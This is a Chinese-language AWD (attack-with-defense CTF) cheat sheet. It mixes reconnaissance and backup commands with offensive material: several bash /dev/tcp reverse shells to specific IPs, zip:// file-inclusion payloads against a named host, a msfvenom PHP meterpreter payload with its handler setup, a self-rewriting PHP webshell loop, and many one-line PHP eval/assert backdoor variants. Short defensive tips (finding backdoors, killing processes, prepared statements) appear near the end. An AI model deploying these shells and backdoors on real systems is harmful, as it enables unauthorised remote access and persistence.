AWD整理

AWD整理




nmap -nv ip    （-n：不做域名解析）
nmap -sS ip SYN
nmap -T4 -A 高强度

python -c 'import pty;pty.spawn("/bin/bash")'

tar -zcf /tmp/xxx.tar.gz html
tar -xzvf /tmp/xxx.tar.gz

mysqldump -uxxx -pxxx dbname > xxx.sql

passwd
修改网站管理员密码
update users set password=md5("xxxxxx");    （不带 where 条件会把表中所有用户的密码一起改掉；表名和字段名以实际应用为准）
修改数据库密码
set password for 用户名@localhost = password('新密码');
（MySQL 8.0 已移除 password() 函数，此时改用：alter user '用户名'@'localhost' identified by '新密码';）


bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash

rm -rf /var/www/html/upload_lab/upload/*

zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?

op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p

利用msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j

php不死马
caidao

';
	while (1) {
		file_put_contents($file, $code);
		//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
}



后门（常见的一句话写法；防守时在自己的 web 目录里搜索下面这些函数与 $_POST/$_GET/$_REQUEST 一起出现的位置）
eval($_POST[“a”]);
assert($_POST[“a”]);     可以写成$a=“assert”;$a($_POST[a]);
array_filter(array($_POST[“a”]),”assert”);
preg_replace("/test/e",$_POST[“a"],"jutst test");
$func =create_function('',$_POST[‘a’]);$func();
echo array_map(“assert”, array($_POST[“a”]));
call_user_func("assert",$_POST['cmd’]);
call_user_func_array("assert", array($_POST[“a”]));
等等

删除不死马
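kill -9 -1
kill -9 -1
（以 web 服务运行用户的身份执行：kill -9 -1 会结束该用户有权限发信号的所有进程，用 root 执行会把 sshd 等服务一起杀掉。进程结束后再删除被循环反复写回的文件，否则循环还在运行时删掉也会立刻重新生成。）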


linux新建用户

useradd -m username1
passwd username1
usermod -a -G sudo username1

防注入
addslashes（只做引号转义，数字型参数和宽字节编码场景下不可靠；SQL 查询优先使用 PDO/mysqli 预处理语句）
htmlspecialchars（用于输出到 HTML 时防 XSS，不能防 SQL 注入）


